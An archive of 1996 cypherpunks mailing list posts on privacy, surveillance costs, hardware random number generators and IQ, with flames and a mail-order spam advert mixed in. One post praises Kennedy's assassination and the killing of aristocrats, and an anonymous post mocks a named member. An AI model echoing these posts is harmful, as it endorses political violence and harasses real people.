From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Thu, 28 Nov 1996 18:02:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9611290148.AA16350@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 28 Nov 1996 jbugden@smtplink.alis.ca wrote:

> Another anecdotal example is in the opening chapters of "Surely You're Joking,
> Mr. Feynman" by Richard Feynman, the late Caltech professor and general bon
> vivant. He describes how his mother introduced a doctor, a general and a
> professor with the same respectful tones indicating to him that a career in
> academia was as highly valued as any other high position in society.

Your lower middle class slip is showing.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 28 Nov 1996 21:43:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: SMTP import error #-5
In-Reply-To: <199611290354.VAA07416@mail.gte.net>
Message-ID: <329E77D3.6B31@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


No Alias Created wrote:
> Igor Chudov @ home wrote:
> > Dale Thorn wrote:
> > > The biggest influence on IQ are the so-called "engrams" (fears, super-
> > > stitions, anxieties, etc.) planted in your brain early in life.
> > > Some of this can be overcome with mental exercise, and awareness of what
> > > negative influences are holding you back.  Much easier said than done!
> > > IQ as they attempt to measure it can probably be most easily explained
> > > as pattern matching skills. Unfortunately for testing, and although you
> > > can be every bit as intelligent at 70 as at 10, your pattern-matching
> > > skills change and evolve over time, so any given tests will only apply
> > > (more or less) at the age group they are optimized for.
> 
> > Would you dismiss strong correlations between IQ and success in life
> > and academia as something irrelevant?
> 
> Not at all, and I think you could make some interesting equations out of
> this if you wanted to spend the time.
> 
> Factors for raw intelligence, i.e., pattern matching skills.
> Factors for aggressiveness, assertiveness, self-confidence, etc.
> Factors for manipulative ability (to manipulate people, etc.).  I don't
> know how to properly categorize this last item, but perhaps a professional
> psychologist would.
> 
> In sum, I think you could observe successful people and establish most
> of the relevant factors, but be aware - if you are not an insider in
> several of these "success circles", you might miss one or more key
> factors, particularly those that would be denied by successful people,
> such as willingness to do things people don't like to talk about openly.

Another new error message!  Seems like a new one every couple days now.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 28 Nov 1996 21:46:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: SMTP import error #-5
In-Reply-To: <199611290354.VAA07568@mail.gte.net>
Message-ID: <329E7897.3454@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


No Alias Created wrote:
> Dr.Dimitri Vulis KOTM wrote:
> > Ernest Hua <hua@chromatic.com> writes:
> > > McNeil & Lehear (sp?)  (ok, I know, one of them is gone, but I forgot
> > > which) News Hour had a segment on crypto policy.  Generally a balanced
> > > non-technical report, except that there is no mention of the free
> > > speech issue.

> > Do you think they should have mentioned that cypherpunks are against free
> > speech and that John Gilmore (spit) is a liar and a content-based censor?
> > Gilmore is irrelevant and not worth mentioning.

> BTW, there's an excellent picture in the Public Domain showing Robert
> McNeil (sp?) looking over the fence on the grassy knoll, seconds after
> they blew off the president's head.  I guess ol' Bob musta been one of
> those "extremely few, ignorant, stupid people" who thought shots may
> have come from somewhere besides the depository (per O.C. Register).

Another new error message!  Seems like every other day now.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 28 Nov 1996 21:49:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: SMTP import error #-5
In-Reply-To: <199611290354.VAA07486@mail.gte.net>
Message-ID: <329E7933.3043@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


No Alias Created wrote:
> Ernest Hua wrote:
> > > > It is truly counter-productive to insist on conspiracy theories and
> > > > anti-government rhetoric.  Sure, there have been conspiracies in the
> > > > past.  Sure, there have been more than our fair share of atrocities.
> 
> [mucho snippo]
> 
> The danger in conspiracy theories (and you can check the L.A. Times for
> verification of this) is that they are often tied in to anti-Semitism
> and other forms of racism, and/or provide an excuse to....
> 
> The fact is, though, that only government possesses the power to ruin the
> lives of masses of people, which they have often done, even in this century.
> Anyone who says "the conspiracies aren't true" and "anti-government rhetoric
> is automatically bad", etc. is just sticking their head in the sand.
> 
> The militias are a necessary correction to government excess, however
> negative the implications of militia power might be.
> 
> As far as the difficulty in creating the infrastructure to monitor every-
> one, well, it exists and is growing by the minute.  All "they" have to do
> is listen in, and have smart programs to sort out what they want to look
> at (which they certainly do).  Think of it as a percentage deal.  The
> people the govt. most want to monitor are the ones who are the most
> active in their travel and communication, therefore, it greatly reduces
> the monitoring load.

Another new error message.  Every other day, a new error.  Who's doing
this?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Barnes <cman@c2.net>
Date: Thu, 28 Nov 1996 21:49:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Anon
In-Reply-To: <199611281629.LAA21815@homeport.org>
Message-ID: <199611290549.VAA09766@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Hal Finney wrote:
> | As I mentioned a couple of days ago, science fiction writer David Brin
> | has an argument against not only anonymity, but _privacy_ as well.
> | Where cypherpunks tend to think of privacy as both beneficial and
> | inevitable, Brin sees it as harmful and doomed.  He has an article in
> | the December 1996 issue of Wired discussing his ideas.
> | 
> | BTW cypherpunk Doug Barnes is also quoted several times in the long
> | article in that issue by Neal Stephenson (Snow Crash, The Diamond Age)
> | about the undersea cables that carry most transnational information
> | traffic.
> | 
> | Hal
> | 
> 
> 

Our December Wired has yet to put in its appearance, so I haven't
had a chance to read it yet, except for a quick scan of Neal's
article (at Fry's) to make sure the intrepid editors at Wired hadn't 
screwed up my quotes. I did, however, review some notes on this subject 
that David Brin gave to Steve Jackson, back when Steve and I were 
working on IO.COM a couple years ago. 

There are many arguments against David's position; let's grant the
possibility of near-perfect surveilance if it has popular support
(which is pretty dubious, but has been addressed by others), and
see what arguments remain:

1) I would conjecture that popular approval would make or break
   this kind of system. It's amazing what kind of spontaneous civil
   disobedience can spring up once there's a critical mass of 
   distaste for something like this.

   (Taiwan story warning...) This reminds me of the pirate cable
   TV wars, which hit their peak during my stay there -- essentially,
   the government had outlawed cable TV altogether, mostly because
   they controlled most of the existing media outlets, and didn't
   believe the citizen-units needed more than what they had. Various
   entrepreneurs began wiring Taipei for cable -- sloppy, ad-hoc
   cable lays that were strung from building to building. The gov't
   would come and cut the cables; new cables would be laid. People
   paid their cable bills, but could never quite manage to identify
   the cable installer when the government came around asking. 
   Programming consisted of a van with a bunch of VCRs and a small
   satellite dish, that would plug into the network at various places.
   It go to the point where in some areas there was so much cable, it
   was tricky to figure out which were the old ones and which were
   the new. Eventually, the government gave up and licensed some
   cable operators.

   One could very much see this sort of thing working in reverse.

2) At the moment in this country, we're seeing civil liberties in
   general being rolled back because right now most people are 
   more afraid of crime that they're afraid of the government. This
   was not always the case, and it's unlikely to remain the case.
   We're essentially losing these liberties because people have MTV-
   attention spans, the media is complacent, and, frankly, the
   government hasn't done enough awful things recently enough, to 
   enough different kinds of people to provoke general disquiet. 

   Give it time, and a few more Wacos.

3) I would argue that perfect surveilance lives in the same realm
   of Platonic ideals as "chairness" and "perfect security."  So
   there are going to be some exceptions, and some flaws.

   Now, given this less-than-perfect surveilance state, that is, 
   surveilance is easier than privacy; a few people can have some
   privacy, but it's really expensive and requires spending some
   multiple of what opponents spend on surveilance (this is the
   opposite of how things are now, but humor me.) Who is going to
   have this privacy? What are they going to do with it? What is
   the public reaction going to be to the abuses that grow out
   of this? My guess is that large governments and large corporations
   will have this privacy (a matter of national security, etc.)
   and will eventually succumb to temptation and use it to perpetrate 
   various nasty things on the general populace while keeping 
   themselves in power.

   Full knowledge != full wisdom. Also, in time, all monopolists get
   complacent and stupid.

4) Assuming that enough people get riled up, see #1. If the 
   state of affairs can be reversed, folks will try to reverse it;
   if not, it's been nice knowing you, citizen-units.

Contrast this to what happens against a backdrop of privacy; it's
possible for much smaller entities to take larger entities (such
as governments or large corporations) by surprise, to outmaneuver
them, swarm over them, and pull them down. (I can't seem to
shake the image of primitive hunters going for a mastodon, here...)
It helps prevent the perpetuation of especially dense concentrations
of wealth & power, it allows markets to function properly, and 
enables folks to plot against tyrannical governments. 

In Brin's world, how does the little startup protect its technology
from Microsoft?

In Brin's world, how does a new political party campaign against the 
unscrupulous incumbents, who have access to the tiny bit of remaining 
privacy, while they have none?

In Brin's world, how does a Christian in Iran avoid that knock on
the door?

Some things to think about.

Doug

PS -- DO read Neal Stephenson's article in the same Wired; it's 
      a bit boosterish, but it's the funniest tract on fiber
      optic cable you'll ever read. It gives a good idea of
      where things are headed (deregulation, disintermediation 
      of cable laying services, cable as speculative investment
      as opposed to guaranteed utility, etc.). I'd argue things
      aren't headed that way as quickly as Neal indicates, but
      certainly where FLAG is landing, it's acting as a catalyst
      for change of this sort.

PPS -- Does anyone know why Fry's gets Wired _weeks_ before actual
       subscribers?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Guy Buckingham <guyb@ionia-mi.net>
Date: Thu, 28 Nov 1996 18:09:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: IQ and age
In-Reply-To: <3.0.32.19961128064857.006aec20@mail.tcbi.com>
Message-ID: <329DC888.7B7F@ionia-mi.net>
MIME-Version: 1.0
Content-Type: text/plain


Lurker wrote:
> 
> At 10:47 PM 11/27/96 -0600, Igor Chudov @ home wrote:
> >Dale Thorn wrote:
> >> The biggest influence on IQ are the so-called "engrams" (fears, super-
> >> stitions, anxieties, etc.) planted in your brain early in life.
> >>
> >> Some of this can be overcome with mental exercise, and awareness of what
> >> negative influences are holding you back.  Much easier said than done!
> >>
> >> IQ as they attempt to measure it can probably be most easily explained
> >> as pattern matching skills. Unfortunately for testing, and although you
> >> can be every bit as intelligent at 70 as at 10, your pattern-matching
> >> skills change and evolve over time, so any given tests will only apply
> >> (more or less) at the age group they are optimized for.
> >>
> >
> >Would you dismiss strong correlations between IQ and success in life
> >and academia as something irrelevant?
> >
> 
> I would.  If you look at who has the oppertunities to go college you will
> note that those who are good at taking tests (SAT, ACT, or IQ) are those
> who get to go.  You will also note that money also breeds success, or can
> someone give me an argument for the fact that there are more rich kids
> going to Harvard, Yale, Stanford, and the like than poor kids. (These
> schools almost gaurentee success.)
> 
> If you want to find a correlation look for it in money not tests.  And if
> you are insistant on finding it in tests, ask why the scores are as they
> are (was the test written to the advantage of one group over another or can
> one group buy the "A" with special courses which teach the skills needed to
> score high.)

     I can understand a person's interest in IQ, but if anyone has been
reading the "stuff" posted lately beware that an enormous amount of it
has been wrong.  As an example it used to be that IQs were a ratio
between you chronological and developmental age, but that only works for
people up to the age of 16, using the first tests used to measure
inteligence quotients.  Think about it.  If this ratio was always the
case, as implied, a person would always have to score higher as they got
older in order to maintain the same IQ.  Take a test and you'd know this
was not possible.  As another example "engrams" in pyschology, really
not mainstream pyschology, actually refer to a concept in The Church of
Scientology or an episode of Star Trek.  I think what is being mentioned
is really so-called "crystalline intelligence".  

     These are just some examples.  I am not writing this as a rant;
just don't want the spread of "misinformation".  If someone would like
more authoritative information I could help.  I am not an expert in the
field, but do teach it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 28 Nov 1996 19:40:01 -0800 (PST)
To: dthorn@gte.net (Dale Thorn)
Subject: Re: Anon
In-Reply-To: <329E3E80.6CB6@gte.net>
Message-ID: <199611290336.WAA23956@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn wrote:
| Adam Shostack wrote:
| > Brin's argument has two ideas that I find annoying.  One is that the
| > changes he forsees are inevitable, the other is that security
| > is not about economics.
| > The idea that universal surveillance is inevitable is based on
| > the assumption that everyone lives in a city, and the technologies of
| > spying can be cheaply deployed.  A good deal of privacy can be
| > obtained by moving a small or large distance away.  Monitoring
| > technology is not cheap.  When it is cheap, the network links to
| > connect it all will still be expensive.  (etc.  The economics of a
| > surveillance state lead to something in the mix, people, cameras,
| > policemen to make arrests etc, being expensive.)

| As far as the unit cost of surveillance goes, it's cheaper every day.
| Hard disk (and other storage) space is way, way up per dollar, processing
| speeds and I/O are improving greatly per dollar, and the type of custom
| database software and O/S employed by the top surveillance pros is not
| at all analogous to the stuff most people use on Unix, DOS, or other
| common small computer systems.  I did some pioneer work in high-speed
| database work, and the software makes a BIG difference in unit cost of
| surveillance.

	Could you give me a cost estimate for keeping video of the
last 10 minutes of 250 million lives?  This is essentially one of
Brin's suggestions, and it strikes me as astoundingly pricey, even if
you just consider the cost of cameras, fiber, switches, and vcrs, and
ignore the problem of deciding what tape to keep.

	Some back of the envelope leads me to over a trillion,
figuring that a second of video takes 10kb, and disk costs about
$50/mb.  250m cameras at $40 each, fiber connections at $400 each,
etc.

Adam

-- 
"Pretty soon, you're talking about real money."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 28 Nov 1996 23:07:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: market for hardware RNG?
Message-ID: <199611290706.XAA01029@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:12 PM 11/26/96 +0000, Matthew J. Miszewski wrote:

>> 2.  Users of programs like PGP today already get at least a fairly decent 
>> RNG already.  Would they want better?  (I'm not suggesting a total 
>> replacement; I assume that the output of any hardware RNG would be hashed 
>> with more "traditional" PC sources, like disk timings, keyboard timings, 
>> etc, which should deter attempts to attack just the hardware part.)
>
>Why would you hash good RNG output? 

Re-read (read?) Applied Cryptography.  Hardware RNG's contain biases, even 
though they may only be tiny ones.  For example, a RNG based on radioactive 
decay and a geiger counter has a certain minimum "dead time" between decays 
that introduces a slight bias.  Most electronic circuits naively intended to 
generate random numbers contain similar biases.  If I build a device to 
generate ones and zeroes based on electronic noise, I must assume that there 
there will be some non-randomness in the output, however small.  This is 
somewhat equivalent to saying that there is somewhat less than 1.000000 bit 
of entropy in each bit of the RNG output.  If I recall correctly, a data 
stream with 0.5 bits of entropy per bit might be one that contains 
uncorrelated bits which are "0" 3/4s of the time, "1" 1/4 of the time.  

Fortunately, as I recall it is possible to, in effect, "distill" the 
randomness of the sample using hashing.  Start out with 200 bits with 0.5 
bits per bit of entropy, and you can produce 100 bits with 1.0000 bit per 
bit of entropy.  (Condensing the thing even further can't put more than 1 
bit of entropy into each bit; but what it does do is provide some margin for 
entropy sources whose biases may vary somewhat.)  The advantage, however, is 
that it is probably far easier to distinguish 0.2 bits per bit of entropy 
from 0.1 bits, compared with distinguishing 0.99 bits from 1.000 bits.  If 
you know you have at least 0.2 bits per bit, hashing down a factor of 10 
would produce a solidly random output.

If I understand the process correctly, this means that the "figure of merit" 
of any RNG should be the number of bits of randomized output it can 
successfully create per second.  100,000 bits per second of output with 0.5 
bits of entropy per bit is, therefore, better than 10,000 bits with 1.000 
bits per bit, because the former can be converted to 50,000 bits of unbiased 
output per second.  This result may not be exactly counter-intuitive, but it 
is at least NON-intuitive.   

But what this does do is to provide an opportunity:  Build a circuit that 
generates reasonably random output at 10x rate, hash it down to 1x, and you 
can be reasonably certain that the result is cryptographically random.  The 
software could monitor the input to ensure that it remains substantially 
better than needed to guarantee random output.



>I understand your desire to 
>deter hardware only attacks.  I just think it might be an 
>overreaction.  Of course mine could be an under-reaction 8-)

I think if the hardware RNG could be corrupted and that would compromise the 
security appreciably, it WOULD be compromised in important-enough 
situations.  However, adding hashing with more "traditional" sources of 
randomness would make the job futile.  Corrupting the hardware RNG device 
would merely make the system fall back to the current level of security.


>> 3.    Even hardware RNG's aren't "perfect":  they could be subverted, 
>> replaced, or perhaps influenced.  Would someone who was sufficiently 
>> sophisticated as to recognize the need for it actually accept a real, 
>> functioning device?
>
>It would have to go through rigorous testing in the crypto community. 
> RNGs v. PRNGs goes through a yearly debate here on cpunks.  There 
>have been some good discussions on the use of white noise and other 
>potential hardware sources.  Im not sure if hks is back up or not, 
>but you might look there.

Well, we have a chicken-and-egg problem.  Until a commonly-used program 
(like PGP, maybe) easily gives the public the option to include a hardware 
RNG as part of its sources of randomness, few people will be inclined to 
implement such devices and they will remain atrociously expensive...so 
nobody will buy them.


>If an independant entity could certify the product with a good 
>reputation for dedication to the community, you would get much 
>milage.  PGP, Inc. might be interested for instance.  I mean I have 
>used PGP for years but have not had the time to go through the code, 
>etc.  I trust it because Phil's reputation precedes him.

Well, with all due respect, if Phil hesitates to install a hardware random 
source link into a piece of software simply because he thinks that to do so 
puts his reputation on the line, he's placing a high hurdle in front of the 
development of good, economical hardware randomizers.  There's plenty that 
software can do to protect itself from a compromised hardware RNG; 
monitoring the biases of the input and hashing it more than adequately is a 
good start.  It should be possible to ensure that a hardware RNG can only 
improve security, not reduce it.


 
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 28 Nov 1996 20:42:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: IQ and age
In-Reply-To: <329E38E2.4585@gte.net>
Message-ID: <cL15XD24w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn <dthorn@gte.net> writes:
> Speaking of Feynman (who was not only a scientific genius, but was rather
> shrewd in his personal judgements as well), when approached by David Lifton
> (I believe) on the subject of the sudden large-volume displacement of JFK's
> upper torso in the fatal head shot, Feynman found a subtle inconsistency
> in the frames of the film, and thereby excused himself from rendering an
> opinion.

Hi Dale,

The Kennedy motherfucker deserved to die. Whoever shot him did the right thing.

Joe Kennedy was a murderous bootlegger gangster who bought the presidency for
his kid. The French did a great job exterminating their aristos during the
Revolution. So did the Russians. That's what this country needs.

Who cares who shot Kennedy as long as he aimed well. :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 28 Nov 1996 20:40:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Counterproductive Dorothy Denning Flames
In-Reply-To: <199611281834.MAA00656@manifold.algebra.com>
Message-ID: <0315XD25w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor Chudov @ home) writes:

> Dr.Dimitri Vulis KOTM wrote:
> >
> > Why do you think I don't discuss my work on this mailing list?
> >
>
> Lemme take a guess, there is probably a good number of people
> who have a genuine interest as to where you work.

My Ph.D. thesis is avaiable from UMI. I doubt that anyone subscribed to this
mailing list has enough clue to understand any of it. :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Benjamin Grosman <bgrosman@healey.com.au>
Date: Thu, 28 Nov 1996 04:39:22 -0800 (PST)
To: varange@crl.com
Subject: Re: The Difference Between The Right And Left
Message-ID: <2.2.32.19961129093614.0074bd4c@healey.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Dear Sir,
[snip generalised rambling]

>	The left wing is a rather motly collection including many
>	anarchists, communists and nazis, yet many of the same
>	types are decidedly right wing.
>
>	A historical anecdote would be the Bucharin-Rykov wing of
>	the Bolshevik party in the late twenties. They were right 
>	wing while Stalin was left wing.  Yet, Bucharin would be
>	considered quite radical for today's bean counting
>	politics.

Even easier, take the Nazi Party. There name points towards the left wing of
the political spectrum, and yet their policies were left wing only for the
higher echelon, which makes them right wing, as their policies weren't for
the good of the people overall. Their decided tyranny of many spectrums of
the population was also deliberately right wing. And yet the regime was not
tyrannical according to the mould developed by Stalin. It was popular: it
was voted in, and it was supported by the majority of the people throughout
it's rule.

I think you have some decent points. But they are off topic in this list,
and also highly generalised. Such a dissentation is worthy of a thesis, not
a mere hundred or so words.

Yours Sincerely,

Benjamin Grosman


>	This is, of course, confusing to y'all because your all a
>	bunch of stupid college kids.
>
>-- 
>Cheers!
>
>




-------------------------------------------------------------
bgrosman@healey.com.au -- http://www.healey.com.au/~bgrosman/
		PGP Encrypted Mail Preferred

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAzKNX9oAAAEEAOIx4HkRU4vckgguzERhVCxgy5psmngHUoW10Xl8kBkjnuc/
ACysH1K98UXlGfet9zjn/XN4RMnGq64EHXvJu56H7OHhwhoerTpVIW5MUYt+QExk
KKnRNrdq8WVGoaMywSM4qKbaJr8aNMBWkldUKR4NElvAjIEEO9z0msNPp33RAAUR
tClCZW5qYW1pbiBHcm9zbWFuIDxiZ3Jvc21hbkBoZWFsZXkuY29tLmF1PokAlQMF
EDKNX9vc9JrDT6d90QEBxVYEAL5nw1NiyaPpG8R2x7lNcqOcavj/cCmDYT8swT02
Z0AO0C7PGpgp9V38Yyki0FB3yaiJhIQ3Kw6xCtuI8f1F4Vfql/nZebzQERl8kTa4
sI/4xSKRT/Riw/wSGupagU1F1wYIPlXOCdUilIfLzVf4IOsxKjJMdm7aKladSxkV
N7Yg
=Yapx
-----END PGP PUBLIC KEY BLOCK-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@prairienet.org>
Date: Thu, 28 Nov 1996 21:39:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: First Contact
Message-ID: <199611290539.XAA16366@cdale3.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: allyn@allyn.com, cypherpunks@toad.com
Date: Thu Nov 28 23:40:50 1996
> I think that the character Data uses either PGP or some
> sort of crypto system to lock up the ship's computer.
The term used is "fractal cypher."  It's not a terribly
significant plot point IMO (although, for longtime fans
of ST:TNG, there is some juicy humor with Data and the
Borg "Queen" when she tries some, er, unconventional
tactics to try to get him to reveal it.)

> At least if you spend any reasonable time here in 
> cypherpunks, coderpunks, or other crypto related
> areas, you should recognise what he uses. 
AFAIK the "fractal cypher" is just a couple of clever
technobabble words thrown together for effect.

> I have not seen seen it; I am guessing that maybe
> they are using something to excite the juices of
> us Internet folks.
If they are, they're not doing a good job.  :)

> Mark
dave

- ----- David E. Smith, P O Box 324, Cape Girardeau MO USA 63702
dsmith@prairienet.org        http://www.prairienet.org/~dsmith
send mail with subject of "send pgp-key" for my PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMp53b3EZTZHwCEpFAQHZQQf9HCh0nR44oSTGZDYCeElkqUfSUX759F2M
WoUCuJ10EGO6L1euUiwpyg1eBcgicscOliwf0KNYMSdwj2hfAp/gXhWUR8o0XydU
NvnCrOSu2iTvvkzZixB4uuIhKUB8z5Rfzv2Sz0EHWK2XKcBvRhht96uKR7mi+wIg
QSfBgdx+RVFIVbFCIA6PWJ3NhRU6p/c+5ptm0fVAJOJJ4uHWswP58l3aimI6Ormu
TrxEgFs+BezsqvJLNw3ZcAWCYSkOUKJiCC//w/e210RBEJKZOgiht7sSUTJqQDsx
6Z7mnU0hPfOE2Eco+b0zL4U/B7xskUX22OCuDlcsgLsoK1kggsZgjw==
=ciV0
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "captain.sarcastic" <kkoller@panix.com>
Date: Thu, 28 Nov 1996 21:00:05 -0800 (PST)
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: desecration
Message-ID: <199611290459.XAA06828@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.christiangallery.com/digest.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@remail.obscura.com (Mixmaster)
Date: Fri, 29 Nov 1996 01:03:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [ANNOUNCEMENT] Enigma
Message-ID: <199611290806.AAA29595@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim C[reep] May's family tree goes straight up. All of his
ancestors were siblings, to dumb to recognize each other in
the dark.

     _
    {~}
   ( V-) Tim C[reep] May
   '|Y|'
   _|||_




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <mycroft@actrix.gen.nz>
Date: Thu, 28 Nov 1996 03:28:58 -0800 (PST)
To: dlv@bwalk.dm.com
Subject: Re: Counterproductive Dorothy Denning Flames
In-Reply-To: <giw3XD10w165w@bwalk.dm.com>
Message-ID: <199611281111.AAA26386@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Nov 96 19:57:27 EST, Dr.Dimitri Vulis KOTM wrote:

   Yes. On the Internet it may not be immediately evident that the other side
   of the debate is represented by clueless juveniles with whom you simply
   wouldn't talk in a physical encounter. Trying to explain the need for key

Or people who act like clueless juveniles on the net, while seeming to
be nice, rational adults in real life.  I hear you fit that
description fairly well (I, of course, can only speak for the online side).

   > I must admit that I am at a loss to understand the heat which
   > Dorothy Denning generates on the Cypherpunks list, which seems to
   > be second only to the heat generated by posting recipes for roast
   > feline in rec.pets.cats.

   I've seen other people abused on this mailing list - usually, whoever
   knows more about cryptography then the regular "lynch mob".

"Knows more" == "rants endlessly about how the letters "Q.E.D." and
some nonsense about hot air balloons render a cryptosystem
unbreakable."

   I had the pleasure of meeting Dr. Denning in person and I asked her
   about her views on GAK. Her responses made a lot of sense to me. Most
   businesses, if they thought about it, would prohibit their employers
   from having information on company computers encrypted so the owner
   of the computer can't read them. This is just good business sense.

Of course it is.  And they can do this, today, without any
legislation!  I believe the commercial version of PGP (Business
Edition?) has support for this.

This is, of course, totally unrelated to GAK (unless you consider
people to be the property of their government, I suppose).

   This mailing list suffers from the presence of several mentally disturbed
   juveniles who a) are clearly ignorant of cryptography (e.g. rant about
   brute force attacks on OTP); b) are cognizant of their utter ignorance and
   stupidity; c) are envious of anyone who does know what s/he's talking
   about.

d) rant endlessly about Tim May.
e) put "(fart)" or "(spit)" after every other word.
f) rant about John Gilmore's alleged sexual preferences.  (I seem to
   recall something about Tsutomu Shimomura "stealing" his girlfriend??)
g) continually bring up Paul Bradley's "brute forcing a OTP" post,
   which was quite clearly a simple misunderstanding.

[and h) probably rant about me for a while now.  Prove me wrong.]

   So, they feel compelled to harrass anyone who's smarter / more
   knowledgeable than they are (sometimes using the anonymous remailers) in

Ah!  That explains the "Timmy (fart) May" posts!  *Now* I get it!

   The continuing verbal abuse of Dr. Denning is no different from the abuse
   previously heaped on Fred Cohen or David Sternlight or yours truly.

The only "continuing verbal abuse" I've seen on this list is you and
those "Freedom Knight" twits abusing Tim May and John Gilmore.

-- 
Paul Foley <mycroft@actrix.gen.nz>       ---         PGPmail preferred

	   PGP key ID 0x1CA3386D available from keyservers
    fingerprint = 4A 76 83 D8 99 BC ED 33  C5 02 81 C9 BF 7A 91 E8
----------------------------------------------------------------------
Whom computers would destroy, they must first drive mad.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daniel@earthstar.com
Date: Fri, 29 Nov 1996 00:22:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Buy your COMPUTER parts direct from any wholesaler!
Message-ID: <199611290822.AAA00824@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


BUY QUALITY COMPUTERS AND COMPUTER PARTS 
DIRT CHEAP!!!

YOU'RE THROWING YOUR HARD-EARNED MONEY AWAY, 
if you're not buying your computer parts direct from wholesalers, 
using my method.

Stop relying on unethical computer salesmen to sell you your computer 
and all its ancillary parts. Why pay full retail. With my method, you can 
not only PAY WHOLESALE PRICES, but your purchases will be 
TAX FREE, coming from out of state!

You could be buying computer parts for your friends, neighbors, family, 
coworkers, employers and anyone else. You choose if you add a profit 
for yourself or not.

I was the purchasing agent for over six years with a multimillion dollar 
computer company. I've been in the business for myself for the last four 
years. Believe me, I know what I'm talking about. And I'm willing to 
share my secrets, along with a list of hundreds of contacts in the 
wholesale computer business for just $4.95.

If you still need convincing, E-Mail me at daniel@earthstar.com. If 
you're already convinced that my nominal fee is well worth the fantastic 
savings you can begin enjoying on your computer parts, send $5.00
to Daniel Decker,11904 Blueway Ave. , OKC, OK 73162
Be sure and include your e-mail address

I will immediately e-mail you my secret, oh-so-easy method to getting 
wholesale costs, tax free, and the list of wholesale computer companies. 
The list includes the contact names and phone numbers that will help 
you find any part you need, from RAM chips to CD ROM burners.
I'm so confident that this information will pay for itself many times
over, I'll refund the COMPLETE purchase price if your not 100
percent satisfied. No questions asked, no hard feelings, period.

WHAT ARE YOU WAITING FOR?  The longer you wait, the more 
money you could be wasting. Contact me immediately. I'm ready to 
help you save money.

			Daniel Decker
			daniel@earthstar.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 28 Nov 1996 23:06:41 -0800 (PST)
To: adam@homeport.org (Adam Shostack)
Subject: Re: Anon
In-Reply-To: <199611290336.WAA23956@homeport.org>
Message-ID: <199611290626.AAA03912@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Adam Shostack wrote:
> 	Could you give me a cost estimate for keeping video of the
> last 10 minutes of 250 million lives?  This is essentially one of
> Brin's suggestions, and it strikes me as astoundingly pricey, even if
> you just consider the cost of cameras, fiber, switches, and vcrs, and
> ignore the problem of deciding what tape to keep.
> 
> 	Some back of the envelope leads me to over a trillion,
> figuring that a second of video takes 10kb, and disk costs about
> $50/mb.  250m cameras at $40 each, fiber connections at $400 each,
